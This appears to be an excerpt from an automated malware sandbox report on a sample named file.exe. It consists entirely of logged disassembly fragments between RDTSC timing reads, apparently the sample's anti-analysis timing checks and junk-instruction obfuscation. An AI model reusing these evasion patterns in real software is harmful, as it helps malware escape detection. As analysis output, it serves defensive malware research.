                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FAA7B second address: 12FAA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FB034 second address: 12FB041 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC400D80DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FB041 second address: 12FB090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 cmc 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FC400504818h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 add ebx, 151B1DD4h 0x0000002e xchg eax, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 jmp 00007FC400504827h 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FB090 second address: 12FB095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FB095 second address: 12FB09B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FB245 second address: 12FB249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FCF9F second address: 12FCFF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push esi 0x00000007 jp 00007FC40050481Ch 0x0000000d pop esi 0x0000000e nop 0x0000000f sub bx, 290Fh 0x00000014 push 00000000h 0x00000016 mov edi, 14736BFFh 0x0000001b push 00000000h 0x0000001d pushad 0x0000001e movsx esi, dx 0x00000021 jmp 00007FC400504826h 0x00000026 popad 0x00000027 xchg eax, esi 0x00000028 pushad 0x00000029 push edx 0x0000002a jmp 00007FC400504820h 0x0000002f pop edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push edx 0x00000033 pop edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FCFF5 second address: 12FD006 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC400D80DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FDFB2 second address: 12FDFB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FF0D0 second address: 12FF0D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FF0D4 second address: 12FF0F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC400504827h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130269D second address: 1302709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 pushad 0x0000000a sub dword ptr [ebp+122D1829h], eax 0x00000010 mov dword ptr [ebp+1245D951h], esi 0x00000016 popad 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007FC400D80DA8h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 xor ebx, dword ptr [ebp+122D2BDEh] 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edi 0x0000003e call 00007FC400D80DA8h 0x00000043 pop edi 0x00000044 mov dword ptr [esp+04h], edi 0x00000048 add dword ptr [esp+04h], 0000001Bh 0x00000050 inc edi 0x00000051 push edi 0x00000052 ret 0x00000053 pop edi 0x00000054 ret 0x00000055 push ebx 0x00000056 mov edi, 2114D800h 0x0000005b pop ebx 0x0000005c xchg eax, esi 0x0000005d pushad 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FD13A second address: 12FD13F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FE243 second address: 12FE247 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FF292 second address: 12FF296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FD13F second address: 12FD146 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130037B second address: 1300387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1304958 second address: 1304977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC400D80DA6h 0x0000000a popad 0x0000000b jmp 00007FC400D80DAEh 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FF296 second address: 12FF2B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FC40050481Ch 0x0000000c jne 00007FC400504816h 0x00000012 popad 0x00000013 push eax 0x00000014 je 00007FC400504822h 0x0000001a jng 00007FC40050481Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FD146 second address: 12FD15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jc 00007FC400D80DA8h 0x0000000f push eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305700 second address: 1305712 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 js 00007FC400504824h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1300387 second address: 1300392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC400D80DA6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1304977 second address: 1304980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305712 second address: 1305716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1304980 second address: 1304984 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FF375 second address: 12FF379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305716 second address: 1305781 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007FC400504818h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 cmc 0x00000022 push 00000000h 0x00000024 mov dword ptr [ebp+122D2338h], edi 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007FC400504818h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 mov ebx, dword ptr [ebp+122D29B6h] 0x0000004c xchg eax, esi 0x0000004d jmp 00007FC40050481Ah 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push ebx 0x00000058 pop ebx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FF379 second address: 12FF37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305781 second address: 1305785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305785 second address: 130578B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A280 second address: 130A2A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400504829h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A2A4 second address: 130A2AE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC400D80DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130DE6D second address: 130DE74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1311E6F second address: 1311E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1311E75 second address: 1311E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1311E79 second address: 1311EAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400D80DB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jg 00007FC400D80DAEh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jc 00007FC400D80DAEh 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13058E0 second address: 13058E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13058E4 second address: 130598F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FC400D80DA8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 jnp 00007FC400D80DACh 0x0000002a push dword ptr fs:[00000000h] 0x00000031 mov ebx, dword ptr [ebp+122D221Eh] 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push 00000000h 0x00000040 push edi 0x00000041 call 00007FC400D80DA8h 0x00000046 pop edi 0x00000047 mov dword ptr [esp+04h], edi 0x0000004b add dword ptr [esp+04h], 00000019h 0x00000053 inc edi 0x00000054 push edi 0x00000055 ret 0x00000056 pop edi 0x00000057 ret 0x00000058 mov edi, 152F9A10h 0x0000005d mov eax, dword ptr [ebp+122D10D5h] 0x00000063 jnc 00007FC400D80DB4h 0x00000069 push FFFFFFFFh 0x0000006b jmp 00007FC400D80DB1h 0x00000070 push eax 0x00000071 jo 00007FC400D80DAEh 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1318D4B second address: 1318D66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC40050481Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13180DF second address: 13180E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131864C second address: 1318662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pushad 0x0000000a jp 00007FC400504816h 0x00000010 pushad 0x00000011 popad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1318787 second address: 131879B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FC400D80DAEh 0x0000000c jo 00007FC400D80DA6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131879B second address: 13187A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13187A1 second address: 13187B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC400D80DACh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13187B1 second address: 13187B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1318906 second address: 131890A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1318BDF second address: 1318BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC400504824h 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1318BFC second address: 1318C02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131B96C second address: 131B988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FC400504826h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131B988 second address: 131B9A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC400D80DB2h 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0168 second address: 12B016E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B016E second address: 12B0172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0172 second address: 12B017E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131F91D second address: 131F921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131FBB5 second address: 131FBBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131FBBE second address: 131FBD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400D80DB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131FBD8 second address: 131FBE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FC400504816h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131FFF8 second address: 131FFFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131FFFC second address: 1320015 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC400504816h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edi 0x0000000f jnp 00007FC400504816h 0x00000015 pop edi 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1320015 second address: 1320022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007FC400D80DB2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13202C1 second address: 13202C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13202C8 second address: 13202CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13202CE second address: 13202D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13202D7 second address: 13202DD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13206D8 second address: 13206DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13206DF second address: 13206E9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC400D80DAEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132086F second address: 132087A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D151D second address: 12D1529 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FC400D80DA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B507C second address: 12B5090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 pushad 0x0000000a jl 00007FC40050481Eh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B5090 second address: 12B5099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131F649 second address: 131F66B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC40050481Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FC400504832h 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FC400504816h 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E99B9 second address: 12E99BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E99BE second address: 12E99C8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC40050481Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E99C8 second address: 12E9A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], ebx 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FC400D80DA8h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D182Fh], edx 0x00000029 push dword ptr fs:[00000000h] 0x00000030 mov ch, 50h 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 xor dword ptr [ebp+122D282Bh], ecx 0x0000003f mov dword ptr [ebp+1248F61Dh], esp 0x00000045 mov dword ptr [ebp+122D282Bh], esi 0x0000004b cmp dword ptr [ebp+122D2BE6h], 00000000h 0x00000052 jne 00007FC400D80E93h 0x00000058 movsx ecx, dx 0x0000005b mov ecx, ebx 0x0000005d mov byte ptr [ebp+122D2854h], 00000047h 0x00000064 mov dword ptr [ebp+122D1BF5h], ebx 0x0000006a mov eax, D49AA7D2h 0x0000006f pushad 0x00000070 add al, 00000038h 0x00000073 mov eax, dword ptr [ebp+122D2B9Ah] 0x00000079 popad 0x0000007a push eax 0x0000007b push eax 0x0000007c push edx 0x0000007d pushad 0x0000007e jmp 00007FC400D80DB8h 0x00000083 pushad 0x00000084 popad 0x00000085 popad 0x00000086 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAA40 second address: 12EAA89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400504821h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FC400504818h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 lea eax, dword ptr [ebp+1248F5C5h] 0x0000002a mov ecx, dword ptr [ebp+124622F2h] 0x00000030 nop 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 push esi 0x00000035 pop esi 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAA89 second address: 12EAAC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC400D80DB7h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC400D80DB9h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAAC3 second address: 12EAACE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FC400504816h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAACE second address: 12D151D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dh, FAh 0x0000000a call dword ptr [ebp+12471FB8h] 0x00000010 jmp 00007FC400D80DB4h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1324738 second address: 132473E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1324904 second address: 1324964 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC400D80DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FC400D80DACh 0x00000010 jc 00007FC400D80DA6h 0x00000016 pushad 0x00000017 jmp 00007FC400D80DADh 0x0000001c jmp 00007FC400D80DABh 0x00000021 jmp 00007FC400D80DB0h 0x00000026 popad 0x00000027 popad 0x00000028 je 00007FC400D80DC4h 0x0000002e jmp 00007FC400D80DB6h 0x00000033 push esi 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
